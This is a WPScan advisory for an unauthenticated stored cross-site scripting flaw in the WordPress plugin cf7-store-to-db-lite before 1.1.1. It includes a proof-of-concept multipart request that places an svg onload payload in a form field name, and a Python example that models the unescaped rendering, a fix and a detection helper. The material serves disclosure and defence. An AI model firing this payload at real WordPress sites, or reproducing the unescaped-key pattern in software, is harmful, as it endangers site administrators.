WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Form Store to DB < 1.1.1 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not sanitise or escape the submitted parameter keys (the form field names) before outputting them back in the created entry, allowing an unauthenticated attacker to perform Stored Cross-Site Scripting attacks against administrators who view that entry.

Proof of Concept

POST /wp-json/contact-form-7/v1/contact-forms/1337/feedback HTTP/2
Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470

-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-name"

Attacker
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-email"

[email protected]
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-subject"

XSS Injection
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-message"

Sorry, not sorry.
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="AA<svg/onload=(alert)(/XSS/)>"

Injected
-----------------------------243715402120191890871051639470--


The submission goes through Contact Form 7's public REST endpoint (1337 above stands for the ID of any form on the site), so no authentication is needed, and the payload is carried in the multipart field name rather than its value. The XSS will be triggered when an administrator views the related Entry in the admin dashboard (/wp-admin/edit.php?post_type=cf7storetodbs).
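The following is an added example, not code from the plugin or from the advisory's author. It models in Python what the description and proof of concept above say happens: the Contact Form 7 submission is stored with both field names and values, and the entry view prints the field names unescaped, so the markup in the last field name becomes live HTML in wp-admin. The function names, the HTML table layout, the placeholder e-mail address and the triage rule in find_suspect_keys() are assumptions for illustration, not anything taken from cf7-store-to-db-lite.

```python
"""
Added example for the CF7 Store to DB advisory (not the plugin's code).
Models the bug in Python: a submission is stored with both field names and
values, and the entry view prints the field *names* unescaped. Function
names, HTML layout and the sample e-mail address are illustrative choices.
"""
import html
import re

# Boundary taken from the advisory's proof of concept.
BOUNDARY = "---------------------------243715402120191890871051639470"

# Constructed sample: the PoC's fields. The e-mail address is a placeholder
# (the page shows it obfuscated); the last key is the actual payload.
POC_FIELDS = {
    "your-name": "Attacker",
    "your-email": "attacker@example.com",
    "your-subject": "XSS Injection",
    "your-message": "Sorry, not sorry.",
    "AA<svg/onload=(alert)(/XSS/)>": "Injected",
}


def build_multipart(fields, boundary=BOUNDARY):
    """Encode fields as a multipart/form-data body, as a browser or curl would.

    The field name goes into Content-Disposition verbatim: nothing in the
    encoding stops a client from putting markup there, which is the whole PoC.
    """
    parts = []
    for name, value in fields.items():
        parts.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n'
            f"\r\n{value}\r\n"
        )
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode()


def parse_submission(body, boundary=BOUNDARY):
    """Minimal multipart parser: returns {field_name: value} in submission order.

    Stands in for what the REST endpoint hands the plugin; note that the keys
    come straight from the client, exactly like the values.
    """
    delimiter = f"--{boundary}".encode()
    fields = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', head)
        if not match:
            continue
        if value.endswith(b"\r\n"):          # drop the CRLF before the next delimiter
            value = value[:-2]
        fields[match.group(1).decode()] = value.decode()
    return fields


def render_entry_vulnerable(fields):
    """Entry view with the advisory's bug: values escaped, keys interpolated raw.

    A key such as AA<svg/onload=...> therefore becomes live markup when an
    administrator opens the entry in wp-admin.
    """
    rows = (f"<tr><th>{key}</th><td>{html.escape(value)}</td></tr>"
            for key, value in fields.items())
    return "<table>" + "".join(rows) + "</table>"


def render_entry_fixed(fields):
    """Corrected view: escape the key exactly like the value (esc_html() on both, in WordPress terms)."""
    rows = (f"<tr><th>{html.escape(key)}</th><td>{html.escape(value)}</td></tr>"
            for key, value in fields.items())
    return "<table>" + "".join(rows) + "</table>"


def find_suspect_keys(fields):
    """Triage helper for already-stored entries (assumed rule): field names come
    from the form template's tags, so a key containing <, >, quotes or '='
    never originated from Contact Form 7 and was supplied by the client."""
    return [key for key in fields if re.search(r"""[<>"'=]""", key)]


if __name__ == "__main__":
    submitted = parse_submission(build_multipart(POC_FIELDS))
    print("vulnerable:", render_entry_vulnerable(submitted))
    print("fixed:     ", render_entry_fixed(submitted))
    print("suspect:   ", find_suspect_keys(submitted))
```

Running it prints the vulnerable rendering with the live <svg> tag, the escaped rendering in which the same key is inert text, and the key flagged by find_suspect_keys(). The fix is the second renderer: treat keys with the same suspicion as values. The triage helper, run over the stored entries of a site that ran a version below 1.1.1, tells you whether the bug was exercised before the upgrade, since the malicious key is still sitting in the database after patching.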

Affects Plugins

cf7-store-to-db-lite
Fixed in version 1.1.1

References

CVE
CVE-2021-25107
URL
https://plugins.trac.wordpress.org/changeset/2657583

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Yoru Oni

Submitter

Yoru Oni

Submitter website
https://profiles.wordpress.org/yoruoni
Verified

Yes

WPVDB ID
3999a1b9-df85-43b1-b412-dc8a6f71cc5d

Timeline

Publicly Published

2022-01-17

Added

2022-01-17

Last Updated

2022-04-12
